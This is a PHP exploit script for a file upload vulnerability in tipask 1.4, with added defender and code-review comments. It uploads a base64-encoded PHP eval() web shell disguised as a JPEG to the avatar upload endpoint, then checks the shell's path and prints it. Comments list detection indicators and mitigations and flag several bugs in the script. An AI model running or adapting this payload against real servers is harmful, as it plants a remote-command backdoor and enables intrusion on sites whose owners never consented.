Exp:
<?
// CLI entry point of a proof-of-concept for the tipask 1.4 avatar upload flaw.
// Usage: php <script> host path   (the usage text below prints the same).
// The two request builders, exploit() and okor(), are defined after this run.
//
// Defender notes: the request indicators on this page are a multipart POST to
// "{path}/?user/editimg.html" carrying a ".php" filename declared as image/jpeg,
// followed by a GET for "{path}/data/tmp/bigavatar0.php" (the expected artifact).
//
// All warnings/notices are suppressed, so bad arguments and socket failures
// below are silent.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
// NOTE(review): unquoted constant name. PHP CLI already defines STDIN, so this
// call is redundant; on current PHP it errors, and error_reporting(0) hides that.
define(STDIN, fopen("php://stdin", "r"));
// ltrim()/rtrim() take a character *mask*, not a prefix: any leading run of the
// characters h, t, p, :, / is stripped (e.g. "https://x" becomes "s://x"), and
// trailing slashes are removed. The scheme is therefore never part of $host.
$host = rtrim(ltrim($argv[1],'http://'),'/');
// Collapse repeated slashes in the path. ereg_replace() was removed in PHP 7.
$path = ereg_replace("(/){2,}", "/", $argv[2]);
//print $host;
print "\n+------------------------------------------------------------------+";
print "\n| |";
print "\n| __ __| _ \ _ \ | | |";
print "\n| | | | | | | __| __ \ _ \ __| |";
print "\n| | | | | | |\__ \ | | __/ | |";
print "\n| _| \___/ \___/ _|____/_)_| _|\___|\__| |";
print "\n| |";
print "\n| tipask1.4 File Upload Vulnerability |";
print "\n| |";
print "\n| |";
print "\n+------------------------------------------------------------------+\n";
// The argument count is checked only after $argv[1] and $argv[2] were read above.
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
die();
}
// Send the upload request; its return value (first response line) is discarded.
exploit($host,$path);
// $url is the scheme-less host, so the printed location below has no "http://".
$url=$host;
// Verify by fetching the expected artifact path (see okor()).
$ors=okor($host,$path);
if ($ors){
echo "[*] Shell:-> ".$url.$path."data/tmp/bigavatar0.php\n";
}else{
print "[-] No Bug!\n";
}
// Build and send the hand-assembled multipart upload request.
//
// Parameters: $host - bare hostname (scheme and trailing slash already stripped
//                     by the caller);
//             $path - application path prefix on that host.
// Returns:    the first line of the HTTP response as read by fgets() (string, or
//             false if the read fails); nothing is returned when the socket
//             yields no line. The caller ignores the value.
//
// Detection indicators: POST to "{path}/?user/editimg.html" with a multipart
// body whose file part is named "1.php" but declared "image/jpeg", and a
// Referer pointing at "css/common/swfupload.swf". The uploaded content decodes
// from the base64 below to a one-line PHP eval()-based web shell, which is the
// file-content indicator to look for in the upload directory.
function exploit($host,$path){
$shellcode='PD9waHAgZXZhbCgkX1BPU1RbbG9zdHdvbGZdKT8+';
$file=base64_decode($shellcode);
//print $file;
// Multipart body with a fixed boundary: a PHPSESSID field set to "1", then the
// file part. The declared MIME type (image/jpeg) contradicts the ".php" filename
// and the PHP content — exactly the mismatch a server-side upload validator
// must reject (check extension and content, not the client-supplied type).
$postdata ="\r\n";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc\r\n";
$postdata .="Content-Disposition: form-data; name=\"PHPSESSID\"\r\n";
$postdata .="\r\n";
$postdata .="1\r\n";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc\r\n";
$postdata .="Content-Disposition: form-data; name=\"Filedata\"; filename=\"1.php\"\r\n";
$postdata .="Content-Type: image/jpeg\r\n";
$postdata .="\r\n";
$postdata .=$file."\r\n";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc--\r\n";
// Raw HTTP/1.1 request built by hand and sent over plain TCP (port 80, no TLS).
$payload = "POST {$path}/?user/editimg.html HTTP/1.1\r\n";
$payload .="Host: $host\r\n";
$payload .="User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n";
$payload .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$payload .="Accept-Language: zh-cn,zh;q=0.5\r\n";
$payload .="Accept-Encoding: gzip, deflate\r\n";
$payload .="Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$payload .="Keep-Alive: 115\r\n";
$payload .="Proxy-Connection: keep-alive\r\n";
// $host carries no scheme (stripped by the caller), so this Referer is not a URL.
$payload .="Referer: $host/css/common/swfupload.swf?preventswfcaching=1321556724903\r\n";
$payload .="Content-type: multipart/form-data; boundary=xndrotxfbsejfrpdhhivrwqkpxrnsdxc\r\n";
// Content-Length is a hard-coded constant, not derived from the body actually sent.
$payload .="Content-Length: 290 \r\n";
$payload.=$postdata;
// The complete request is echoed to stdout before it is sent.
print $payload;
$ock=fsockopen($host,80);
// On connection failure a message is printed but execution continues; the
// fwrite()/feof()/fgets() calls below then run against false (warnings are
// suppressed by error_reporting(0) in the caller).
if (!$ock) {
echo "[*] No response from $host\n";
}
fwrite($ock,$payload);
// The unconditional return exits on the first fgets(), so at most one line of
// the response is read; the socket is never closed and the print after the
// return is unreachable.
while (!feof($ock)) {
//print $payload;
$exp=fgets($ock, 1024);
return $exp;
print $postdata;
}
}
// Check whether the uploaded file is reachable at its expected location.
//
// Parameters: $host, $path - as in exploit().
// Returns:    true if the raw response text contains the substring "200"
//             anywhere (status line or body), false otherwise. This is a loose
//             substring test, not a parse of the HTTP status code, so any "200"
//             in an error page's body also counts.
//
// Detection indicator: a GET for "{path}/data/tmp/bigavatar0.php" shortly after
// the upload POST. Application-side mitigation: keep uploads outside the web
// root or deny script execution for the upload directory.
function okor($host,$path){
// Unused.
$tmp = array();
$data = '';
// All socket errors are @-suppressed; 60 s connect timeout. $errno/$errstr are
// filled on failure but never inspected.
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,"GET {$path}/data/tmp/bigavatar0.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n");
// Read the whole response; the $fp guard skips the loop after a failed connect.
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if (strpos($data, '200') !== false) {
return true;
}else{
return false;
}
}
?> |